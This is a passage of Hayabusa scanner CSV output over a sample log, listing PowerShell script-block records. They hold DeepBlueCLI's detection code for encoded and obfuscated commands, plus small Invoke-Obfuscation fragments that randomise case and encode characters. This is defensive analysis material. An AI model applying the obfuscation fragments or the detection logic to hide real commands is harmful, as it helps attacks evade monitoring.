see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.262 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.265 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.272 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.275 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.659 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.659 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.660 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.661 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:09.364 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:52.559 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:52.574 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.960 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.968 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.973 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.976 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.978 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.981 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.991 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 